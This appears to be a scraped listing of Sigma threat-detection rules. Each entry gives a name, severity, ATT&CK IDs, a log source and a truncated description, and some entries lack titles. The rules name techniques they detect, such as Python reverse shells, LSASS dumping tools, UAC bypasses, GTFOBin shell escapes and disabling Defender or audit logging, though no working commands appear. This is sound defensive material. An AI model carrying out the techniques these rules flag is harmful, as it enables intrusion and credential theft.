imProcessCreate
Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes. Suspicious child processes spawned by baaupdate.exe could i
Audit Rules Deleted Via Auditctl
sigma high
T1562.012
imProcessCreate
Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. This technique is commonly used by attackers to disable
T1204.002
imFileEvent
Detects the creation of files with an executable or script extension by an Office application.
Mask System Power Settings Via Systemctl
sigma high
T1653
imProcessCreate
Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep. Adversaries may mask these targets to prevent a system from entering sleep or
imNetworkSession
Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.
T1203
imNetworkSession
Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. This rule aims to detect traffic similar to one seen exploited in CVE-2021-42
Ping Hex IP
sigma high
T1140T1027
imProcessCreate
Detects a ping command that uses a hex encoded IP address
T1112T1491.001
imRegistry
Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
PUA - Restic Backup Tool Execution
sigma high
T1048T1567.002
imProcessCreate
Detects the execution of the Restic backup tool, which can be used for data exfiltration. Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, includ
Python WebServer Execution - Linux
sigma medium
T1048.003
imProcessCreate
Detects the execution of Python web servers via command line interface (CLI). After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a w
T1490
DeviceImageLoadEvents
Detects the image load of VSS DLL by uncommon executables
Suspicious WSMAN Provider Image Loads
sigma medium
T1059.001T1021.003
DeviceImageLoadEvents
Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
T1218
imProcessCreate
Detect usage of the "ssh.exe" binary as a proxy to launch other programs.
T1070.002
imProcessCreate
Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks
Suspicious Startup Folder Persistence
sigma high
T1204.002T1547.001
imFileEvent
Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. These files (.ps1, .vbs, .js, .bat,
WSL Kali-Linux Usage
sigma high
T1202
imProcessCreate
Detects the use of Kali Linux through Windows Subsystem for Linux
T1546.007
imRegistry
Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
Process Creation Using Sysnative Folder
sigma medium
T1055
imProcessCreate
Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
Recon Command Output Piped To Findstr.EXE
sigma medium
T1057
imProcessCreate
Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often tim
Amsi.DLL Loaded Via LOLBIN Process
sigma medium
DeviceImageLoadEvents
Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack
imRegistry
Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious.
File Download with Headless Browser
sigma high
T1105T1564.003
imProcessCreate
Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
HackTool - LaZagne Execution
sigma medium
imProcessCreate
Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer. LaZagne has been leveraged multiple times by threat actors in order to dump cre
Internet Explorer DisableFirstRunCustomize Enabled
sigma medium
imRegistry
Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing
New Kernel Driver Via SC.EXE
sigma medium
T1543.003
imProcessCreate
Detects creation of a new service (kernel driver) with the type "kernel"
Potential Antivirus Software DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
Potential DLL Sideloading Of DBGHELP.DLL
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "dbghelp.dll"
Potential Goopdate.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
Potential PendingFileRenameOperations Tampering
sigma medium
T1036.003
imRegistry
Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.
T1204.002
imProcessCreate
Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this cou
Potentially Suspicious Windows App Activity
sigma medium
imProcessCreate
Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution
PowerShell Core DLL Loaded By Non PowerShell Process
sigma medium
T1059.001
DeviceImageLoadEvents
Detects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.
imFileEvent
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
Process Proxy Execution Via Squirrel.EXE
sigma medium
T1218
imProcessCreate
Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
PSScriptPolicyTest Creation By Uncommon Process
sigma medium
imFileEvent
Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
Removal Of AMSI Provider Registry Keys
sigma high
T1685
imRegistry
Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
Removal of Potential COM Hijacking Registry Keys
sigma medium
T1112
imRegistry
Detects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could
Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
sigma medium
T1053.005
imProcessCreate
Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
Service Binary in Suspicious Folder
sigma high
T1112
imRegistry
Detect the creation of a service with a service binary located in a suspicious directory
Windows Binaries Write Suspicious Extensions
sigma high
T1036
imFileEvent
Detects Windows executables that write files with suspicious extensions
New RUN Key Pointing to Suspicious Folder
sigma high
T1547.001
imRegistry
Detects suspicious new RUN key element pointing to an executable in a suspicious folder
Potential DLL Sideloading Of DBGCORE.DLL
sigma medium
T1574.001
DeviceImageLoadEvents
Detects DLL sideloading of "dbgcore.dll"
Linux Sudo Chroot Execution
sigma low
T1068
imProcessCreate
Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. Attackers may use this technique to evade detection and execute comman
RunMRU Registry Key Deletion - Registry
sigma high
T1070.003
imRegistry
Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog. In the clickfix techniques, the phishing lures instruct users to open a run dialog
PUA - TruffleHog Execution
sigma medium
T1083T1552.001
imProcessCreate
Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intende
PUA - TruffleHog Execution - Linux
sigma medium
T1083T1552.001
imProcessCreate
Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intende
New Service Creation Using Sc.EXE
sigma low
T1543.003
imProcessCreate
Detects the creation of a new service using the "sc.exe" utility.
Potential Persistence Via Notepad++ Plugins
sigma medium
imFileEvent
Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
Potential PsExec Remote Execution
sigma high
T1587.001
imProcessCreate
Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility
Detects ELF obfuscation technique used by Sindoor dropper related to APT 36
Suspicious Velociraptor Child Process
sigma high
T1219
imProcessCreate
Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attack
T1112
imProcessCreate
Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote
Python Image Load By Non-Python Process
sigma low
T1027.002
DeviceImageLoadEvents
Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code. Various tools like Py2Exe, PyInstaller, a
T1547.001T1112
imRegistry
Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict acc
Registry Modification Attempt Via VBScript
sigma medium
T1112T1059.005
imProcessCreate
Detects attempts to modify the registry using VBScript's CreateObject("Wscript.shell") and RegWrite methods via common LOLBINs. It could be an attempt to modify the registry for persistence without us
Potentially Suspicious Execution From Tmp Folder
sigma medium
T1036
imProcessCreate
Detects a potentially suspicious execution of a process located in the '/tmp/' folder
Potential Hello-World Scraper Botnet Activity
sigma medium
T1595
imWebSession
Detects network traffic potentially associated with a scraper botnet variant that uses the "Hello-World/1.0" user-agent string.
T1567T1572T1102
imNetworkSession
Detects an executable initiating a network connection to "ngrok" domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with suc
T1564.006T1564
imProcessCreate
Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
T1190T1505.003
imFileEvent
Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation. This behavior has been observed in the exploitation of SharePoint vulnerabil
Suspicious Double Extension Files
sigma high
T1036.007
imFileEvent
Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.
T1566.001
imFileEvent
Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use suspic
T1059.001T1105
imProcessCreate
Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets.
PowerShell Download and Execution Cradles
sigma high
T1059
imProcessCreate
Detects PowerShell download and execution cradles.
Suspicious PowerShell In Registry Run Keys
sigma medium
T1547.001
imRegistry
Detects potential PowerShell commands or code within registry run keys
WinRAR Creating Files in Startup Locations
sigma high
T1547.001
imFileEvent
Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder. This kind of behaviour has been asso
WinRAR Execution in Non-Standard Folder
sigma medium
T1560.001
imProcessCreate
Detects a suspicious WinRAR execution in a folder which is not the default installation folder
COM Hijacking via TreatAs
sigma medium
T1546.015
imRegistry
Detect modification of TreatAs key to enable "rundll32.exe -sta" command
T1685
imProcessCreate
Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9'). This is a highly
T1490
DeviceImageLoadEvents
Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes. It is often abused by attackers to
T1685
imRegistry
Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'. This is a highly suspicious configuration change that effectiv
T1087.002T1069.002T1482
imFileEvent
Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data
ADS Zone.Identifier Deleted By Uncommon Application
sigma medium
T1070.004
imFileEvent
Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
Potential Binary Or Script Dropper Via PowerShell
sigma medium
imFileEvent
Detects PowerShell creating a binary executable or a script file.
T1003.001
imProcessCreate
Detects the execution of the Doppelanger hacktool which is used to dump LSASS memory via process cloning while evading common detection methods
HackTool - HollowReaper Execution
sigma high
T1055.012
imProcessCreate
Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing. It replaces the memory of a legitimate process with custom shellcode
T1557.001T1187
imProcessCreate
Detects the presence of "UWhRC....AAYBAAAA" pattern in command line. The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION struct
T1059.004T1203
imProcessCreate
Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution
T1574.007T1548.002
DeviceImageLoadEvents
Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification. This technique tricks Windows into treat
TrustedPath UAC Bypass Pattern
sigma critical
T1548.002
imProcessCreate
Detects indicators of a UAC bypass method by mocking directories
Access of Sudoers File Content
sigma medium
T1592.004
imProcessCreate
Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.
Disable Internal Tools or Feature in Registry
sigma medium
T1112
imRegistry
Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)
Local Groups Discovery - Linux
sigma low
T1069.001
imProcessCreate
Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
Suspicious Double Extension File Execution
sigma high
T1566.001
imProcessCreate
Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns
Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server
sigma medium
T1219T1105
imProcessCreate
Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line. These parameters configure the agent to connect to a specific RMM server with authentic
Enumeration for 3rd Party Creds From CLI
sigma medium
T1552.002
imProcessCreate
Detects processes that query known 3rd party registry keys that holds credentials via commandline
T1204T1059.007T1105
imFileEvent
Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL. This behavior may indicate an attempt to execute remotely hosted, potential
T1555.003T1217
imFileEvent
Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts. Adversaries may attempt to access browser credential storage to extract
HackTool - Impacket File Indicators
sigma high
T1003.001
imFileEvent
Detects file creation events with filename patterns used by Impacket.
T1219.002
imProcessCreate
Detects potential execution of MeshAgent which is a tool used for remote access. Historical data shows that threat actors rename MeshAgent binary to evade detection. Matching command lines with the '-
Obfuscated PowerShell OneLiner Execution
sigma high
T1059.001T1685
imProcessCreate
Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
Potential Binary Impersonating Sysinternals Tools
sigma medium
T1218T1202T1036.005
imProcessCreate
Detects binaries that use the same name as legitimate sysinternals tools to evade detection. This rule looks for the execution of binaries that are named similarly to Sysinternals tools. Adversary may
T1685.001T1112
imRegistry
Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events. Windows Event Log is a service that collects and stores event logs from the
T1552.001
imProcessCreate
Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt). This can give access to plaintext passwords used in PowerShell commands or used
T1204.002
imProcessCreate
Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 c
Conhost Spawned By Uncommon Parent Process
sigma medium
T1059
imProcessCreate
Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
Potential WinAPI Calls Via CommandLine
sigma high
T1106
imProcessCreate
Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec
T1036.003T1036.005
imProcessCreate
Detect suspicious parent processes of well-known Windows processes
T1059.001T1027
imProcessCreate
Detects suspicious encoded character syntax often used for defense evasion
Potential DLL Sideloading Of MsCorSvc.DLL
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "mscorsvc.dll".
AspNetCompiler Execution
sigma medium
T1127
imProcessCreate
Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.
T1127
imProcessCreate
Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
Remote Access Tool - AnyDesk Execution
sigma medium
T1219.002
imProcessCreate
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
T1219.002
imProcessCreate
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
Remote Access Tool - AnyDesk Incoming Connection
sigma medium
T1219.002
imNetworkSession
Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
Suspicious Binary Writes Via AnyDesk
sigma high
T1219.002
imFileEvent
Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a l
T1102
imNetworkSession
Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
Notepad Password Files Discovery
sigma low
T1083
imProcessCreate
Detects the execution of Notepad to open a file that has the string "password" which may indicate unauthorized access to credentials or suspicious activity.
T1547.001
imProcessCreate
Detects suspicious command line reg.exe tool adding key to RUN key in Registry
Suspicious Run Key from Download
sigma high
T1547.001
imRegistry
Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
T1053.005
imProcessCreate
Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
T1036.002
imFileEvent
Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.
MMC Loading Script Engines DLLs
sigma medium
T1059.005T1218.014
DeviceImageLoadEvents
Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt to execute malicious scripts within a trusted system process for
PUA - NimScan Execution
sigma medium
T1046
imProcessCreate
Detects usage of NimScan, a portscanner utility. In early 2025, adversaries were observed using this utility to scan for open ports on remote hosts in a compromised environment. This rule identifies t
T1053.005T1218T1105
imProcessCreate
Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them. This facilitates executing malicious paylo
WCE wceaux.dll Access
sigma critical
T1003
imRegistry
Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
T1204
imFileEvent
Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.
HackTool - Dumpert Process Dumper Execution
sigma critical
T1003.001
imProcessCreate
Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
T1055.001
imProcessCreate
Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution
Renamed ZOHO Dctask64 Execution
sigma high
T1036T1055.001T1202T1218
imProcessCreate
Detects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execut
T1059
DeviceImageLoadEvents
Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File.
Exploit Framework User Agent
sigma high
T1071.001
imWebSession
Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs
Shell Execution via Rsync - Linux
sigma high
T1059
imProcessCreate
Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Suspicious Invocation of Shell via Rsync
sigma high
T1059T1203
imProcessCreate
Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This beh
QuickAssist Execution
sigma low
T1219.002
imProcessCreate
Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.
Potential Secure Deletion with SDelete
sigma medium
T1070.004T1027.005T1485T1553.002
imRegistry
Detects files that have extensions commonly seen while SDelete is used to wipe files.
Local System Accounts Discovery - Linux
sigma low
T1087.001
imProcessCreate
Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
NetNTLM Downgrade Attack - Registry
sigma high
T1685T1112
imRegistry
Detects NetNTLM downgrade attack
Always Install Elevated Windows Installer
sigma medium
T1548.002
imProcessCreate
Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege
CMSTP UAC Bypass via COM Object Access
sigma high
T1548.002T1218.003
imProcessCreate
Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
File and Directory Discovery - Linux
sigma low
T1083
imProcessCreate
Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
Non-privileged Usage of Reg or Powershell
sigma high
T1112
imProcessCreate
Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
T1574.011
imProcessCreate
Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
T1574.011
imProcessCreate
Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level
Potential UAC Bypass Via Sdclt.EXE
sigma medium
T1548.002
imProcessCreate
A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
Setup16.EXE Execution With Custom .Lst File
sigma medium
T1574.005
imProcessCreate
Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file. These ".lst" file can contain references to external program that "Setup16.EXE" will execute. Attackers a
Suspicious Child Process Created as System
sigma high
T1134.002
imProcessCreate
Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts
T1202
imProcessCreate
ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administ
Suspicious ShellExec_RunDLL Call Via Ordinal
sigma high
T1218.011
imProcessCreate
Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. Adversary might only use the ordinal number in order to bypass e
T1548.002
imProcessCreate
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Tools Using ComputerDefaults
sigma high
T1548.002
imProcessCreate
Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
UAC Bypass Using ChangePK and SLUI
sigma high
T1548.002
imProcessCreate
Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
T1548.002
imProcessCreate
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
UAC Bypass Using Disk Cleanup
sigma high
T1548.002
imProcessCreate
Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
UAC Bypass Using DismHost
sigma high
T1548.002
imProcessCreate
Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
UAC Bypass Using IDiagnostic Profile
sigma high
T1548.002
imProcessCreate
Detects the "IDiagnosticProfileUAC" UAC bypass technique
UAC Bypass Using IEInstal - Process
sigma high
T1548.002
imProcessCreate
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
T1548.002
imProcessCreate
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
T1548.002
imProcessCreate
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
UAC Bypass Using PkgMgr and DISM
sigma high
T1548.002
imProcessCreate
Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
T1548.002
imProcessCreate
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
UAC Bypass WSReset
sigma high
T1548.002
imProcessCreate
Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
Suspicious Process By Web Server Process
sigma high
T1505.003T1190
imProcessCreate
Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
HackTool - CoercedPotato Execution
sigma high
T1055
imProcessCreate
Detects the use of CoercedPotato, a tool for privilege escalation
HackTool - CreateMiniDump Execution
sigma high
T1003.001
imProcessCreate
Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
Hacktool Execution - Imphash
sigma critical
T1588.002T1003
imProcessCreate
Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
imProcessCreate
Detects the execution GMER tool based on image and hash fields.
HackTool - HandleKatz LSASS Dumper Execution
sigma high
T1003.001
imProcessCreate
Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same
HackTool - Impersonate Execution
sigma medium
T1134.001T1134.003
imProcessCreate
Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
HackTool - LocalPotato Execution
sigma high
imProcessCreate
Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples
HackTool - SysmonEOP Execution
sigma critical
T1068
imProcessCreate
Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
MpiExec Lolbin
sigma high
T1218
imProcessCreate
Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary
PUA - Fast Reverse Proxy (FRP) Execution
sigma high
T1090
imProcessCreate
Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.
PUA- IOX Tunneling Tool Execution
sigma high
T1090
imProcessCreate
Detects the use of IOX - a tool for port forwarding and intranet proxy purposes
PUA - Nimgrab Execution
sigma high
T1105
imProcessCreate
Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.
PUA - NPS Tunneling Tool Execution
sigma high
T1090
imProcessCreate
Detects the use of NPS, a port forwarding and intranet penetration proxy server
Potentially Suspicious Cabinet File Expansion
sigma medium
T1218
imProcessCreate
Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
imProcessCreate
Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
Python Spawning Pretty TTY Via PTY Module
sigma medium
T1059
imProcessCreate
Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
T1059.001
imRegistry
Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and
.RDP File Created By Uncommon Application
sigma high
imFileEvent
Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
T1102T1102.001
imNetworkSession
Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous at
LSASS Process Memory Dump Files
sigma high
T1003.001
imFileEvent
Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
T1685
imRegistry
Detects when attackers or tools disable Windows Defender functionalities via the Windows registry
T1219.002
imProcessCreate
Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by l
Linux HackTool Execution
sigma high
T1587
imProcessCreate
Detects known hacktool execution based on image name.
T1046
imProcessCreate
Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.
Network Connection Initiated To BTunnels Domains
sigma medium
T1567T1572
imNetworkSession
Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Capsh Shell Invocation - Linux
sigma high
T1059
imProcessCreate
Detects the use of the "capsh" utility to invoke a shell.
T1059
imProcessCreate
Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
Shell Execution GCC - Linux
sigma high
T1083
imProcessCreate
Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Shell Execution via Find - Linux
sigma high
T1083
imProcessCreate
Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
Shell Execution via Flock - Linux
sigma high
T1083
imProcessCreate
Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Shell Execution via Git - Linux
sigma high
T1059
imProcessCreate
Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Shell Execution via Nice - Linux
sigma high
T1083
imProcessCreate
Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Shell Invocation via Apt - Linux
sigma medium
T1083
imProcessCreate
Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out fro
Shell Invocation via Env Command - Linux
sigma high
T1059
imProcessCreate
Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
T1059
imProcessCreate
Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate pri
Vim GTFOBin Abuse - Linux
sigma high
T1083
imProcessCreate
Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out fro
Shell Invocation Via Ssh - Linux
sigma high
T1059
imProcessCreate
Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Suspicious Child Process Of Wermgr.EXE
sigma high
T1055T1036
imProcessCreate
Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
Uncommon Sigverif.EXE Child Process
sigma medium
T1216
imProcessCreate
Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.
T1135
imProcessCreate
Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.
HackTool - SharpWSUS/WSUSpendu Execution
sigma high
T1210
imProcessCreate
Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequen
T1564.002
imProcessCreate
